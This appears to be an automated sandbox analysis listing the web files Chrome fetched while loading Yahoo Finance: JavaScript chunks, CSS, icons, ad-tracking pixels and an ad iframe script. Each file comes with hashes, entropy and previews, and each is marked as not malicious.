                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:nTNPQmoU6nYzvh+FFFfZb+JZajiU6qECrZvhY5ZvRFlvVDAx9oGF3JqMrMVMYPlO:npIm16ntFfuIP6qbrZvhY5ZvfFJAHoS3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1BE3EC8102E85FCB0BE5C6DEDD9ABCA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:97126C03EDEC25C5041A25405C1E80B0B91F6A6B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:83F9A3AC82C75712A14394F935C9E2062144961F623A61D33E81A16AB5F5241D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3A6B8FC3A25474761132AAE575133D6F54A6A0837CE56A8902DD720EB94F43504DE2C1CB416309248B395C6A42915114C59D58DAAFEAAAE4619DD03DB9C649ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/PortfolioSymbolCount.svelte_svelte_type_style_lang.EL5Zj2tO.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as U,p as M,k as h,n as E,i as f,y as W,e as S,t as d,d as C,f as k,h as m,q as y,l as p,m as b,a9 as _}from"./scheduler.Dr9AAxFe.js";import{S as X,i as Y}from"./index.DCSmZEjO.js";import{ap as Z,aq as $,g as x,ar as ee,b as R,P as V,Q as D,as as O,N as w}from"./commonUtil.CI22_Irn.js";function te(s){let e,t=s[8](s[3]||s[2])+"",r;return{c(){e=S("span"),r=d(t),this.h()},l(l){e=C(l,"SPAN",{class:!0});var n=k(e);r=m(n,t),n.forEach(f),this.h()},h(){y(e,"class","bold yf-1uof5l0")},m(l,n){h(l,e,n),p(e,r)},p(l,n){n&12&&t!==(t=l[8](l[3]||l[2])+"")&&b(r,t)},d(l){l&&f(e)}}}function le(s){let e,t=s[8](s[3]||s[2])+"",r,l;return{c(){e=S("fin-streamer"),r=d(t),this.h()},l(n){e=C(n,"FIN-STREAMER",{class:!0,"data-symbol":!0,"data-field":!0,"data-trend":!0,"data-template":!0,"data-value":!0,active:!0});var o=k(e);r=m(o,t),o.forEach(f),this.h()},h(){_(e,"class","price bold yf-1uof5l0"),_(e,"data-symbol",s[4]||s[5]),_(e,"data-field",l=s[0].id),_(e,"data-trend","none"),_(e,"data-template",`${s[7]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2691
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.705386975705373
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:U7esar5d9uhqBtkXNi2lN8+yKM4mMGhSvmvy5vxTxBs:aesMg0kL8+dGMjmv6Ts
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2EDF1EF8B333C40979976D1A49BC234C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D75AC12795B4A9575C874E1B190712CD62A87AFC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:50A1901684F223BF26594DD3415B1E50F184820A16DAA810CC5452911E9117A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F697A1FA0786316FC01003F72621920932E2657E4ACF5A471E35D02717C42C9DB5A12DF311895A776A563DCAE9B8FC0B6721833529A054B9DBFFF4C52FC564D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/1.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............PLTEGpL.............u.........................................................................U................................................................g......................................U......................................................................................................................................................................................................1.................................]....!.....G....f.......g..../....8..-.....}................a....................+.....$.....o...........9..W........x..<.....j..........l...........r..>.....Z..@........X.. ........4..............c..........*....R.....H....A.._...............J..i....................'.............M.....T..y..#............7......uMe...\tRNS.........................(.)-b.m....w...A....^.].............k...ka`.......xx.??...*.(........IDATX.W.TSW..!.I. .Pp.D.....Y..ms..{..N .+a....u..X..Z......].....<.\.s..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2586)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):22537
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.532860985165806
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:4qEMQl6FtO53n+8svyf53Fo5oeHvVFBIuwRatEDTJi/EDdBC6ZcuLI4Xhw/XgsB6:4qEMQlwOFn+DCFoeeFqYt2TJisnC6ZcU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:38D4F310E650C3877EB2E2C55860F77B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:41D2F4BD61DF909B531BF54EC54AB66CFC8712CC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C6F4951F54B1F8F2F57A668518D6EBC3D94ABF1A1A1ACA440DE486B13D02D85D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:037D0A44AD44D3934029F40997165FB3F690D0C5804BF8EFBD1DC4928258A963D6F7B60D761C17E1BFE581EEEF9C58C58C6E85BF983E4203165F61939FBEE440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var n=this||self;function ea(a,b,c){return a.call.apply(a.bind,arguments)}function p(a,b,c){p=ea;return p.apply(null,arguments)}function fa(a,b){function c(){}c.pr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):247
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.417739541804018
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:H69mc4sl3O4ZDLzc6XxlIXtFoFY3FYXtHwHXW7IVoXtHwHXW7yz:a1PZLzc6BSnoYKdUSIVodUSa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0C7E4F0571F3A9FFF611B64B54CB8BB8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5285D474E876354196B6C434C15C9E732A44DFEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DCE077EA95B600945113399EEAA2A98E95156F43C36C1C12019045FFDED51ED5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8870008B63F5BDF6A519F16AEFF721252F77E39214E89C93D7FFAD582FD71B86914070DC55D5D62801C238163720D555C1CF1AFF57FB90F0C9DBE8608E469756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2m0 2c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2m0 6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2"/></svg>';export{s as K};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889227488523016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUdrllHh/:HJ/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:28D6814F309EA289F847C69CF91194C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0F4E929DD5BB2564F7AB9C76338E04E292A42ACE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8337212354871836E6763A41E615916C89BAC5B3F1F0ADF60BA43C7C806E1015
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1D68B92E8D822FE82DC7563EDD7B37F3418A02A89F1A9F0454CCA664C2FC2565235E0D85540FF9BE0B20175BE3F5B7B4EAE1175067465D5CCA13486AAB4C582C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.adform.net/cookie?gdpr=0&gdpr_consent=&us_privacy=&gpp=&gpp_sid=&redirect_url=https%3A%2F%2Fsync.a-mo.net%2Fsetuid%3FA%3D68d32af8-495d-4c33-841d-b59b90ac7b1d%26bidder%3Dadform%26uid%3D%24UID
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 340x179, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13523
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.90687842893869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:Ovp8SLhChCBlgCg5Ds9bsWSNkcKom+asCZTGenl5KIw9yH2gq:2840klg5qb7d5TGel5rigq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:64059A3B03680A5425393DB3960CEC4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:56D7D6C6153FA1B5BA86384EFC3ABE3A73A432F2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AAC02E86C0F61F425AD261AFC50F8466D6EC85951883A51F6DE97B32283D2DEC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:498F5099DB010F0CC32135ADF3391117E60E47E9B9585240A608733BD975E4EFCE315D150AB9795547CAAA8AEA5BE23F15CC7B3D8180128B38B705387F61CAE2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......JFIF.............(ICC_PROFILE.......appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl....8.G.m..Oz../................................desc.......0cprt...,...Pwtpt...|....rXYZ........gXYZ........bXYZ........rTRC....... chad.......,bTRC....... gTRC....... mluc............enUS.........D.i.s.p.l.a.y. .P.3mluc............enUS...4.....C.o.p.y.r.i.g.h.t. .A.p.p.l.e. .I.n.c...,. .2.0.2.2XYZ ...............,XYZ ..........=.....XYZ ......J....7....XYZ ......(8.......para..........ff......Y.......[sf32.......B.......&.......................n................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.........T.."..........3................................................................N...,...q..rFb..c&AB.&..?..3<n......PT'./Q..VW]...n]s.Q.GNd....b.`...#....8#..f.eb.k.,.....9..0I9....1p.^..>L..x."U..!.M.....E`.\..r.!.e.F}.....:....o...r...2.[..fa.d....PZO.PI.........`d9;~....AN..9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (717)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):786
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.219841148069385
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:0pRlddWZgvIlRkJo/Vu6MO3RctoHwIfATqckxg7iQD8rnaS4NM:0RddRvIlail3u21fATqc50raRNM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FB5A4594B9FFEF704D61BB6E6F80F145
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B5CE60A22B42FCD31FE8B2810AAA277D545BE43B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3C30F0F816ADA3A1410045D740A98E4D2FAF07FC74FFC0430678B21ABBD05138
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:77C63E1249E4BDF2DE43C74531A64E0AFE7305662BFA46252C432318B374CE7B0A6FC24645A5FDD5E9A4B18D4D924BF74E970B6E64D20B45DFBA263E51AD5FB4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://tsdtocl.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!doctype html>.<html>.<head>.<script>.!function(){var e="tsdtocl",t="!-#@",a=2;try{var n=function t(a,n){return n.namespace=e,n.id=a,parent.postMessage(JSON.stringify(n),"*"),n},r=function e(r,s,c){try{if(void 0===c||void 0===r||void 0===s)throw 0;var i=localStorage.getItem(s),o=i?i.split(t):[];if(-1!==o.indexOf(c))return n(r,{success:!0,wasAppended:!1});o.push(c);var d=o.slice(-a).join(t);localStorage.setItem(s,d);var u=localStorage.getItem(s);return n(r,{value:d,wasAppended:!0,success:u===d})}catch(e){return n(r,{success:!1})}},s=function t(a){var n;try{n=JSON.parse(a.data)}catch(e){}if(n&&n.namespace===e&&"append"===n.action)return r(n.id,n.key,n.value)};window.self!==window.top&&window.addEventListener("message",s,!1)}catch(e){}}();</script>.</head>.<body></body>.</html>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):37
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.628108095241738
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:XPY3V+AMCDUgav:/Yl+AMnv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:564ADA9EE3603B4F14C06CEF9190C4FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:70263BBDC39DECB3FE7EA013179FA0F0AB1A54B2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:66E77EAB0A0D1F48D9A6E8AFA5479B74C5762370BEAE0F9FAE70242C99E27206
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5BE5BE79B8FE77B35334CFFDD65385FDC031442E7D6FB98E7CE1757F26925C12F9A79F0512BEA596625E76DED52CAD69D7D6495766085739A4E9EF6AC6B0F2FD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Header.BvCA0Mhu.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.placeholder.yf-6nfr06{height:143px}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/g/images/spaceball.gif
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (3425)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3426
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3951713067293845
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:/4BMVejpKWdmxd95ersyPsWw9XK7DkKNtI:/4yV4xmxd95er7Pl7DNtI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E0F00144D4E2AA3C2FBCA0C6D44DDBD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:03834B8FF5D252B5A4DB76510B95B60FE7ED8558
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9E7968299D74BAEDB5403FAF77738E625EADA63B057BB4B7C9C487798CEF479C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CED36799B0EBD9EB00D09F28333034F987AD1A21BE784ED09E7B875F1E385E3DE118021857B713CC04F88BBF71647E736C9D7D89FBB9865E59D7314DAA5CAF27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/ViewMoreLink.ZEdK_9F5.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as j,p as h,k,i as d,c as T,A as q,b as C,j as F,u as w,g as z,a as N,t as I,h as O,m as R}from"./scheduler.Dr9AAxFe.js";import{S as W,i as v,g as B,a as m,e as D,t as c,c as V,b as E,m as p,d as A}from"./index.DCSmZEjO.js";import{g as G,a as H}from"./spread.CgU5AtxT.js";import{A as L}from"./arrow_forward.8N8VOjY3.js";import{L as S}from"./Link.Cll6KZpb.js";import{t as J}from"./commonUtil.CI22_Irn.js";function K(a){let l,t,i;const s=a[9].default,n=T(s,a,a[10],null),r=[{className:a[4]},{href:a[0]},{"aria-label":a[6]},{size:a[8][a[5]]},{i13nModel:a[1]},{title:a[6]},{variant:"subtle"},{icon:L},{"data-testid":a[2]},a[3]?{"data-sveltekit-reload":""}:{}];let u={$$slots:{default:[Q]},$$scope:{ctx:a}};for(let e=0;e<r.length;e+=1)u=q(u,r[e]);return t=new S({props:u}),{c(){n&&n.c(),l=C(),V(t.$$.fragment)},l(e){n&&n.l(e),l=F(e),E(t.$$.fragment,e)},m(e,o){n&&n.m(e,o),k(e,l,o),p(t,e,o),i=!0},p(e,o){n&&n.p&&(!i||o&1024)&&w(n,s,e,e[10],i?N(s,e[10],o,null):z(e[10]),null);const _=o&383?G(r,[o&1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1234)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.299437297247461
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:ovMMsfsx7aH1R2efLNhuVlF2OhdkGuAJst5/E+14Xy+cyFbUwOh7:ovAfqmH1Pfzc2YCGhGnvsx/bC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:44D0FA4C983B5244CE40D4AA2005DCDB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BCA6C8F85F1DCD0D681A274CC2BE5E9BBBCDE879
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:445F983469DC46178F96B47212255C92E1E5FAA7953A2A61084B98FD9A5585D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1AB6256798E5D402CEBBFF4FFF71F3D6A5BC95388F368ED77503255196E7CB1E05B558674D423C05A362F3CC92F029BFBA573A9A56BAC95BC6DDC6C256A0F63C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as u}from"./scheduler.Dr9AAxFe.js";import{S as r,i as _,c as g,b as v,m as w,t as I,a as N,d as T}from"./index.DCSmZEjO.js";import{A}from"./AdGroup.CD4BTzLP.js";function h(o){let a,n;return a=new A({props:{ids:o[5],dataTestId:o[2],device:o[1],className:o[0],load:o[3],overflow:o[4]}}),{c(){g(a.$$.fragment)},l(e){v(a.$$.fragment,e)},m(e,i){w(a,e,i),n=!0},p(e,[i]){const s={};i&32&&(s.ids=e[5]),i&4&&(s.dataTestId=e[2]),i&2&&(s.device=e[1]),i&1&&(s.className=e[0]),i&8&&(s.load=e[3]),i&16&&(s.overflow=e[4]),a.$set(s)},i(e){n||(I(a.$$.fragment,e),n=!0)},o(e){N(a.$$.fragment,e),n=!1},d(e){T(a,e)}}}function S(o,a,n){let e,{className:i=""}=a,{position:s}=a,{id:d=void 0}=a,{device:f="all"}=a,{dataTestId:l="ad-container"}=a,{load:m="onmount"}=a,{overflow:c=!1}=a;return o.$$set=t=>{"className"in t&&n(0,i=t.className),"position"in t&&n(6,s=t.position),"id"in t&&n(7,d=t.id),"device"in t&&n(1,f=t.device),"dataTestId"in t&&n(2,l=t.dataTestId),"load"in t&&n(3,m=t.load),"overflow"in t&&n(4,c=t.o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://dsum-sec.casalemedia.com/crum?cm_dsp_id=46&external_user_id=6863456619421248072&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
